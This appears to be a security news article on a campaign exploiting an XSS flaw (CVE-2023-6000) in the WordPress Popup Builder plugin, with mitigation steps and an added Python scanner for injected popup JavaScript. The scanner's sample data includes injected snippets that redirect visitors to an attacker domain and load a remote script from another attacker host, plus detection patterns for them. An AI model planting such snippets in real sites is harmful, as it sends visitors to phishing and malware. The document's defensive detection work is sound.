WordPress Plugin Vulnerability Exploited, Infecting 3,300 Sites with Malware

A growing number of WordPress websites are being compromised by attackers exploiting a vulnerability in outdated versions of the Popup Builder plugin, and the campaign has so far planted malicious code on more than 3,300 sites. The flaw, tracked as CVE-2023-6000, is a cross-site scripting (XSS) vulnerability in Popup Builder versions 4.2.3 and older and was first disclosed in November 2023. This is not the first campaign to abuse it: a Balada Injector campaign earlier this year infected over 6,700 websites, and exploitation continues because many site administrators still have not applied the patch. Sucuri now reports a resurgence of attacks against the same vulnerability, with a marked increase in activity over the past three weeks. PublicWWW results show the code injections associated with this latest campaign on 3,329 WordPress sites, and Sucuri's own scanners have identified 1,170 infections.

Attack Methodology

The attackers abuse the plugin's Custom JavaScript and Custom CSS sections, the same fields a legitimate administrator would edit in the WordPress admin interface. The injected code is stored alongside the popup's settings in the ‘wp_postmeta’ database table, so it persists in the database and is served on every page where the popup loads.

The injected code is registered as handlers for the Popup Builder plugin's own events, including ‘sgpb-ShouldOpen’, ‘sgpb-ShouldClose’, ‘sgpb-WillOpen’, ‘sgpbDidOpen’, ‘sgpbWillClose’, and ‘sgpb-DidClose’. As a result, the payload runs in the visitor's browser at precisely those moments, for example when a popup opens or closes, rather than on page load where a casual inspection might notice it.

While the exact actions of the injected code may vary, Sucuri notes that the primary objective appears to be redirecting visitors of compromised sites to malicious destinations like phishing pages and malware distribution sites.

In some instances, analysts observed a redirect URL (e.g., hxxp://ttincoming.traveltraffic[.]cc/?traffic) injected as the ‘redirect-url’ parameter of a “contact-form-7” popup, so the plugin itself performs the redirect without any custom JavaScript.

In other cases the injected handler fetches a second-stage script from an external host and inserts it into the page’s head, where the browser executes it.

This variant gives attackers far more latitude than a hard-coded redirect: because the payload lives on a server they control, they can change what visitors receive at any time without touching the compromised site again, and the remote script can perform any action the page itself could.

Mitigation

To mitigate the risk associated with these attacks:

  1. Block Malicious Domains: Block access to the domains “ttincoming.traveltraffic[.]cc” and “host.cloudsonicwave[.]com” at your network or server level, and treat any request to them as an indicator of compromise. Note that the redirects and remote script loads run in visitors' browsers, so server-side blocking alone does not protect them; it is a hunting and monitoring control, not a substitute for patching.
  2. Update Popup Builder Plugin: If you use the Popup Builder plugin on your WordPress site, update it promptly to the latest version (4.2.7 at the time of writing). This release addresses CVE-2023-6000 along with other security issues.
  3. Address Outdated Versions: WordPress.org statistics indicate that a substantial number of active sites are still running Popup Builder versions 4.1 and older. Confirm that you are not among them and upgrade to the latest version to reduce the attack surface.
  4. Infection Remediation: If a site is already infected, remove the malicious entries from the Custom JavaScript and Custom CSS sections of the Popup Builder plugin and check the ‘redirect-url’ setting of every popup. Then scan the site thoroughly for any hidden backdoor that could allow reinfection; cleaning the injected handlers alone is not enough if the attacker retains another way in.
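The attack methodology above describes two tell-tale shapes of injected custom JavaScript (a redirect bound to a Popup Builder event, and a remote script appended to the head), and remediation step 4 calls for finding such entries. The following scanner, added here as an example and not code from the article or from Sucuri, applies those heuristics to rows exported from ‘wp_postmeta’. The row layout, the `sg_popup_options` meta key and the sample entries are constructed for illustration; real Popup Builder storage may differ, so adapt the row loader to your export.

```python
import re

# Indicators of compromise named in the article.
IOC_DOMAINS = ("ttincoming.traveltraffic.cc", "host.cloudsonicwave.com")

# Popup Builder event names the injected handlers were observed hooking.
SGPB_EVENTS = ("sgpb-ShouldOpen", "sgpb-ShouldClose", "sgpb-WillOpen",
               "sgpbDidOpen", "sgpbWillClose", "sgpb-DidClose")

# Assignment of an absolute URL to the page location (visitor redirect).
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.)?location(?:\.href)?\s*=\s*['\"]https?://", re.I)
# Creation of a <script> element plus insertion into <head> (remote loader).
CREATE_SCRIPT_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I)
HEAD_APPEND_RE = re.compile(
    r"(?:\.head|getElementsByTagName\(\s*['\"]head['\"]\s*\)\s*\[\s*0\s*\])\.appendChild", re.I)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

# Constructed sample rows standing in for a wp_postmeta export. The meta_key
# name is an assumption, not taken from the plugin's source.
SAMPLE_ROWS = [
    # Legitimate: pushes an analytics event when the popup opens.
    {"post_id": 101, "meta_key": "sg_popup_options", "meta_value":
     "jQuery(window).on('sgpbDidOpen', function(){ dataLayer.push({event:'popup_open'}); });"},
    # Injected: redirects the visitor as soon as the popup is about to open.
    {"post_id": 102, "meta_key": "sg_popup_options", "meta_value":
     "jQuery(window).on('sgpb-ShouldOpen', function(){ "
     "window.location.href = 'http://ttincoming.traveltraffic.cc/?traffic'; });"},
    # Injected: loads a second-stage script from an attacker host into <head>.
    {"post_id": 103, "meta_key": "sg_popup_options", "meta_value":
     "var s=document.createElement('script');"
     "s.src='https://host.cloudsonicwave.com/x.js';document.head.appendChild(s);"},
]


def external_hosts(js, site_host):
    """Hostnames referenced by absolute URLs in the snippet, excluding the site itself."""
    return sorted({h.lower() for h in URL_HOST_RE.findall(js)
                   if h.lower() != site_host.lower()})


def scan_custom_js(js, site_host):
    """Return human-readable reasons why this custom JS looks injected (empty if clean)."""
    reasons = []
    hosts = external_hosts(js, site_host)
    for host in hosts:
        if host in IOC_DOMAINS:
            reasons.append(f"known IOC domain: {host}")
    hooked = [e for e in SGPB_EVENTS if e in js]
    if hooked and REDIRECT_RE.search(js):
        reasons.append(f"redirect on popup event(s): {', '.join(hooked)}")
    if CREATE_SCRIPT_RE.search(js) and HEAD_APPEND_RE.search(js) and hosts:
        reasons.append(f"remote script injected into head from: {', '.join(hosts)}")
    return reasons


def scan_rows(rows, site_host):
    """Map post_id -> reasons for every row whose custom JS looks injected."""
    findings = {}
    for row in rows:
        reasons = scan_custom_js(row["meta_value"], site_host)
        if reasons:
            findings[row["post_id"]] = reasons
    return findings


if __name__ == "__main__":
    for post_id, reasons in scan_rows(SAMPLE_ROWS, "example.com").items():
        print(f"popup post {post_id}:")
        for reason in reasons:
            print("  -", reason)
```

The site's own hostname is passed in so that legitimate absolute links to the site are not counted as external. Treat a hit as a lead, not a verdict: a remote script loaded from a known analytics or tag-manager host will also trigger the head-injection rule and needs a human to confirm the host is expected. The scanner does not inspect the ‘redirect-url’ popup setting, which is stored separately and should be reviewed by hand as step 4 describes.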